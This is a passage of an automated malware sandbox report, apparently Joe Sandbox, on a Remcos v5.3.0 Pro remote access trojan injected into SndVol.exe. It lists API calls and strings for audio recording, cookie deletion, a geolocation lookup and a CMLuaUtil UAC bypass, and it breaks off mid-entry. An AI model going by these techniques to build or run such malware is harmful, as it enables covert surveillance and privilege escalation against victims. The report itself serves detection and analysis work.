                                                                                                                        • Opcode Fuzzy Hash: fc2577fde5b75c17f899923718ec5858afdf759b0479a517dfd3e698f4216c4f
                                                                                                                        • Instruction Fuzzy Hash: EC315071248349A9E312DF65D840F9FFBECAFC9B44F04090FB98497290DAA1D94C87A7
                                                                                                                        Function 02967E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 02967EBC
                                                                                                                        • _free.LIBCMT ref: 02967EE0
                                                                                                                        • _free.LIBCMT ref: 02968067
                                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0297D478), ref: 02968079
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,0299179C,000000FF,00000000,0000003F,00000000,?,?), ref: 029680F1
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,029917F0,000000FF,?,0000003F,00000000,?), ref: 0296811E
                                                                                                                        • _free.LIBCMT ref: 02968233
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314583886-0
                                                                                                                        • Opcode ID: 906be47a6aa2ea79a94081f821ebc87e0d9c24fc0cb33b18926b023bdc7d2f28
                                                                                                                        • Instruction ID: 75946b44e7e2d5a446bd74ea0ef759f7ce8972d9d90e9a617cc690f605b5fb47
                                                                                                                        • Opcode Fuzzy Hash: 906be47a6aa2ea79a94081f821ebc87e0d9c24fc0cb33b18926b023bdc7d2f28
                                                                                                                        • Instruction Fuzzy Hash: 3EC1F571904206AFDB21DFB88C48AFABBFDFF85364F1449AAD89597240E7318A45CB50
                                                                                                                        Function 0296F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 269201875-0
                                                                                                                        • Opcode ID: 9b4a2842c4e557ff9bff1a801b336682b23ce2d42175fa4011d3b8274692137e
                                                                                                                        • Instruction ID: c5f0d5c19cc74ea6f229d02ab3d7e9cc82c88064d1598ac8b631f67f3ae94fd4
                                                                                                                        • Opcode Fuzzy Hash: 9b4a2842c4e557ff9bff1a801b336682b23ce2d42175fa4011d3b8274692137e
                                                                                                                        • Instruction Fuzzy Hash: DC61D172D00205AFDB20DF68D845BBEBBF9EF44720F2444AAE956EB640E7309981CF50
                                                                                                                        Function 0296A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0296A838,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0296A105
                                                                                                                        • __fassign.LIBCMT ref: 0296A180
                                                                                                                        • __fassign.LIBCMT ref: 0296A19B
                                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0296A1C1
                                                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0296A838,00000000,?,?,?,?,?,?,?,?,?,0296A838,?), ref: 0296A1E0
                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,0296A838,00000000,?,?,?,?,?,?,?,?,?,0296A838,?), ref: 0296A219
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1324828854-0
                                                                                                                        • Opcode ID: 67fb02fb1ba213530875a4348e9f1f27a3e681e34878652a5f1ac22d2c59eaf0
                                                                                                                        • Instruction ID: 95fe592f421abd7afbe4172a48eeaaeb1749813122a8e4b7234a194406a87197
                                                                                                                        • Opcode Fuzzy Hash: 67fb02fb1ba213530875a4348e9f1f27a3e681e34878652a5f1ac22d2c59eaf0
                                                                                                                        • Instruction Fuzzy Hash: 18518C70E442099FDB10CFA8D889AFEBBF8FF49310F14455AE955E7281E731A951CB60
                                                                                                                        Function 02957A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957AAB
                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 02957AB3
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957B41
                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 02957B6C
                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 02957BC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                        • String ID: csm
                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                        • Opcode ID: d933ff5505bcdefe459766e24d2ef58791f4240562be5ec4fb7d1557f031119d
                                                                                                                        • Instruction ID: 3c340fa363095be7629ce148d683c8a954401674cbc9bd2f1390e0b8612f673e
                                                                                                                        • Opcode Fuzzy Hash: d933ff5505bcdefe459766e24d2ef58791f4240562be5ec4fb7d1557f031119d
                                                                                                                        • Instruction Fuzzy Hash: C041B134B00229DBCF10DFA8C844AEEFBBAAF45328F148599EC155B281D7319B15CF90
                                                                                                                        Function 02921A8E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _strftime.LIBCMT ref: 02921AD3
                                                                                                                          • Part of subcall function 02921BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 02921C54
                                                                                                                        • waveInUnprepareHeader.WINMM(02991AC0,00000020,00000000,?), ref: 02921B85
                                                                                                                        • waveInPrepareHeader.WINMM(02991AC0,00000020), ref: 02921BC3
                                                                                                                        • waveInAddBuffer.WINMM(02991AC0,00000020), ref: 02921BD2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                        • String ID: %Y-%m-%d %H.%M$.wav
                                                                                                                        • API String ID: 3809562944-3597965672
                                                                                                                        • Opcode ID: 13bca41a6ef7f933cd5766f1bd8dcae0aaadd00f815cf6667cca5dd02364e32a
                                                                                                                        • Instruction ID: 947cf3abe1358370e304ed7720de1a2b8b194851ea443746556732181b9e3774
                                                                                                                        • Opcode Fuzzy Hash: 13bca41a6ef7f933cd5766f1bd8dcae0aaadd00f815cf6667cca5dd02364e32a
                                                                                                                        • Instruction Fuzzy Hash: 083161319493119BD714EB28DC50EAB77EAFB94320F40482DE15E821A5EF705E2DCF66
                                                                                                                        Function 0292B6EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02932513: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 02932537
                                                                                                                          • Part of subcall function 02932513: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 02932554
                                                                                                                          • Part of subcall function 02932513: RegCloseKey.KERNELBASE(?), ref: 0293255F
                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0292B76C
                                                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0292B779
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                        • API String ID: 1133728706-4073444585
                                                                                                                        • Opcode ID: 70cdfa33fc27e818a291210346b6065a3e0e509e7649ff5f1ce73285a2af1d94
                                                                                                                        • Instruction ID: 9a8fb244a2cbd371f8a871a5be749adfe2a18e9fe5843a410abcf83db5c6330f
                                                                                                                        • Opcode Fuzzy Hash: 70cdfa33fc27e818a291210346b6065a3e0e509e7649ff5f1ce73285a2af1d94
                                                                                                                        • Instruction Fuzzy Hash: 9F21B131940129A6DB04FBF1DC759EE73AEAFD0318F440018D5066B189EF605A1DCAD1
                                                                                                                        Function 02975903 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1e5b3ae138bd3616ad669875e2ba9338ea91d28566e22c458bf645baf173a61b
                                                                                                                        • Instruction ID: 25bc8cfab93c790ff16ae1a71b4621616902cdb9215bec0b393faea854b8501f
                                                                                                                        • Opcode Fuzzy Hash: 1e5b3ae138bd3616ad669875e2ba9338ea91d28566e22c458bf645baf173a61b
                                                                                                                        • Instruction Fuzzy Hash: 0011E971608255BBDB216FB6CC48E7B7AADEFC1770B960A19FC15C7240DA758800CBB0
                                                                                                                        Function 0293A51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0293A53E
                                                                                                                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0293A554
                                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0293A56D
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0293A5B3
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 0293A5B6
                                                                                                                        Strings
                                                                                                                        • http://geoplugin.net/json.gp, xrefs: 0293A54E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                        • String ID: http://geoplugin.net/json.gp
                                                                                                                        • API String ID: 3121278467-91888290
                                                                                                                        • Opcode ID: c2e760c2b0dc854aa365aa6347d07904f7665e0101e9fee4ffcb1899e994ae75
                                                                                                                        • Instruction ID: 0b5909a474d79cbf4f4b927c18afa32aa994e50fb052536a5c08cc23c5b68bf1
                                                                                                                        • Opcode Fuzzy Hash: c2e760c2b0dc854aa365aa6347d07904f7665e0101e9fee4ffcb1899e994ae75
                                                                                                                        • Instruction Fuzzy Hash: 4E11C4316093226BD224EA559C44EBF7F9DEF85260F00093DF909D2140CB54980CCAF1
                                                                                                                        Function 02926815 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\SndVol.exe), ref: 02926835
                                                                                                                          • Part of subcall function 02926764: _wcslen.LIBCMT ref: 02926788
                                                                                                                          • Part of subcall function 02926764: CoGetObject.OLE32(?,00000024,029859B0,00000000), ref: 029267E9
                                                                                                                        • CoUninitialize.OLE32 ref: 0292688E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                        • String ID: C:\Windows\SysWOW64\SndVol.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                        • API String ID: 3851391207-991305910
                                                                                                                        • Opcode ID: d7293d1b83ab6227da3143aedb4e2c4aa086ef2763ad81a0a5833cc44e2c9ca3
                                                                                                                        • Instruction ID: f14025b64bf6a89676d8c40d1f4b6d15abdd880abf770b47f59a1b67141cd5eb
                                                                                                                        • Opcode Fuzzy Hash: d7293d1b83ab6227da3143aedb4e2c4aa086ef2763ad81a0a5833cc44e2c9ca3
                                                                                                                        • Instruction Fuzzy Hash: EE01DE727013246FF2286B50DC0AF7B775DDF81A29F66012EF54586588EBA1A8084AA1
                                                                                                                        Function 0292B2A8 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0292B2E4
                                                                                                                        • GetLastError.KERNEL32 ref: 0292B2EE
                                                                                                                        Strings
                                                                                                                        • [Chrome Cookies not found], xrefs: 0292B308
                                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0292B2AF
                                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0292B314
                                                                                                                        • UserProfile, xrefs: 0292B2B4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                        • API String ID: 2018770650-304995407
                                                                                                                        • Opcode ID: 44649937a1e87f5d349c64809e38230953eae0fb78e8366ad4f521dadbe9d8b2
                                                                                                                        • Instruction ID: 0ecf2dbb62b0cf4fe309978534c68039877f0c96cb7b5dc0eea80c42ea5d8dbf
                                                                                                                        • Opcode Fuzzy Hash: 44649937a1e87f5d349c64809e38230953eae0fb78e8366ad4f521dadbe9d8b2
                                                                                                                        • Instruction Fuzzy Hash: 8B017D32A450246BD704BAB4DE7BDFE3769ADE0718B810515E017531CEFE41591CCBC1
                                                                                                                        Function 0293BEB0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • AllocConsole.KERNEL32(02994358), ref: 0293BEB9
                                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0293BED2
                                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0293BEF7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Console$AllocOutputShowWindow
                                                                                                                        • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                        • API String ID: 2425139147-2527699604
                                                                                                                        • Opcode ID: fd71768ef4fac957fb930b72692f3b7ba5ae7016629bdee77b8a4e3ed8b87bd7
                                                                                                                        • Instruction ID: d95102c85850bad6513251351ec8d411a7732899d76035de5ef4d048c92c79c4
                                                                                                                        • Opcode Fuzzy Hash: fd71768ef4fac957fb930b72692f3b7ba5ae7016629bdee77b8a4e3ed8b87bd7
                                                                                                                        • Instruction Fuzzy Hash: 42018FB1EC03046BEA14FBF08D5AFEE77AD6F94740F440821B605E7081DAA5A5188F65
                                                                                                                        Function 029595FC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __allrem.LIBCMT ref: 02959789
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029597A5
                                                                                                                        • __allrem.LIBCMT ref: 029597BC
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 029597DA
                                                                                                                        • __allrem.LIBCMT ref: 029597F1
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0295980F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1992179935-0
                                                                                                                        • Opcode ID: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                        • Instruction ID: 8a8a85210aba04c818f5a4a519df5a011aa35b903aff3dca25ea8f82d9bdb728
                                                                                                                        • Opcode Fuzzy Hash: 9c67cb4fed110ca44ac0cc586ac5e74db1fc7c48150eab0f41685f45472ef8a2
                                                                                                                        • Instruction Fuzzy Hash: CF81D172B01B26DBF724DE78CC80B6E73EEAF80764F14452AEA15D6680E774D9058BD0
                                                                                                                        Function 02964B3D Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4189289331-0
                                                                                                                        • Opcode ID: 117e7ce6f215af7f2d9268cf0dc905363ae104521a2acdc4c6bc981a534bd3ac
                                                                                                                        • Instruction ID: b1d25f5035c5a4090b0e6d114fce660e420edea5506013d6843f0ec62e7f65ae
                                                                                                                        • Opcode Fuzzy Hash: 117e7ce6f215af7f2d9268cf0dc905363ae104521a2acdc4c6bc981a534bd3ac
                                                                                                                        • Instruction Fuzzy Hash: E551E436900206BBDB359FE8CD88FBE77FEAF89364F14522DE81596281DB35D500CA64
                                                                                                                        Function 02929E48 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00001388), ref: 02929E62
                                                                                                                          • Part of subcall function 02929D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02929E6F), ref: 02929DCD
                                                                                                                          • Part of subcall function 02929D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02929E6F), ref: 02929DDC
                                                                                                                          • Part of subcall function 02929D97: Sleep.KERNEL32(00002710,?,?,?,02929E6F), ref: 02929E09
                                                                                                                          • Part of subcall function 02929D97: CloseHandle.KERNEL32(00000000,?,?,?,02929E6F), ref: 02929E10
                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02929E9E
                                                                                                                        • GetFileAttributesW.KERNEL32(00000000), ref: 02929EAF
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02929EC6
                                                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02929F40
                                                                                                                          • Part of subcall function 0293B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02929F65), ref: 0293B633
                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02985900,?,00000000,00000000,00000000,00000000,00000000), ref: 0292A049
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3795512280-0
                                                                                                                        • Opcode ID: 828aafd54d2e9782407b927cfb3fc8d29ead12d8ffe409bff5d8977027ff7a57
                                                                                                                        • Instruction ID: 0c81fc313e21a81b44b7baa6a40dbd9e6fe8a8d930f93b1c1d26224bb6eacb98
                                                                                                                        • Opcode Fuzzy Hash: 828aafd54d2e9782407b927cfb3fc8d29ead12d8ffe409bff5d8977027ff7a57
                                                                                                                        • Instruction Fuzzy Hash: 9751C1316043205BCB09FB70DC61ABF779BAFD1314F40092DE49AA71E9DF61991D8E92
                                                                                                                        Function 02966159 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$__alloca_probe_16
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3509577899-3206640213
                                                                                                                        • Opcode ID: d7ae61a30dfc58829836ce0411ce5175ba717861a400c1d48bcb8177087b1762
                                                                                                                        • Instruction ID: b8dde0ad305cd7d0dcb6f199bba8be717ac51557efef4f58483945b87c8f6f65
                                                                                                                        • Opcode Fuzzy Hash: d7ae61a30dfc58829836ce0411ce5175ba717861a400c1d48bcb8177087b1762
                                                                                                                        • Instruction Fuzzy Hash: FED12671910206CBDB248F68C94EBBEBBFDFF45304F18415AEA05AB658D33D9940CB90
                                                                                                                        Function 02957E06 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,02957DFD,029577B1), ref: 02957E14
                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02957E22
                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 02957E3B
                                                                                                                        • SetLastError.KERNEL32(00000000,?,02957DFD,029577B1), ref: 02957E8D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3852720340-0
                                                                                                                        • Opcode ID: 599e5b0323bbe1e95c4a3d3b479d0db05d5f066105d50dc22d9ff41e9321017d
                                                                                                                        • Instruction ID: 0594c3ecc56400c15a5431a863ada0615b1d89e9aa6e538c05042930741938e6
                                                                                                                        • Opcode Fuzzy Hash: 599e5b0323bbe1e95c4a3d3b479d0db05d5f066105d50dc22d9ff41e9321017d
                                                                                                                        • Instruction Fuzzy Hash: D101B13275C3359EEA24A5F87C85ABB6A5EEB41375B20072AED34590E0EF214C289780
                                                                                                                        Function 02966EBF Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,00000000,02960A45,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966EC3
                                                                                                                        • _free.LIBCMT ref: 02966EF6
                                                                                                                        • _free.LIBCMT ref: 02966F1E
                                                                                                                        • SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F2B
                                                                                                                        • SetLastError.KERNEL32(00000000,?,0293AB73,-02995D4C,?,?,?,?,02985900,0292C07B,.vbs), ref: 02966F37
                                                                                                                        • _abort.LIBCMT ref: 02966F3D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000006.00000002.4603814181.0000000002920000.00000040.00000400.00020000.00000000.sdmp, Offset: 02920000, based on PE: true
                                                                                                                        • Associated: 00000006.00000002.4603814181.0000000002996000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_6_2_2920000_SndVol.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3160817290-0
                                                                                                                        • Opcode ID: 02ebf15cc76629c9cb4ed64f85c7f099d2cf375e9eb1dd87a962a242be715a40
                                                                                                                        • Instruction ID: 8778c90af64c761f34021fe3eb2e198bc4d7f6b6e7ded65edc74b6e8b2f8bc18
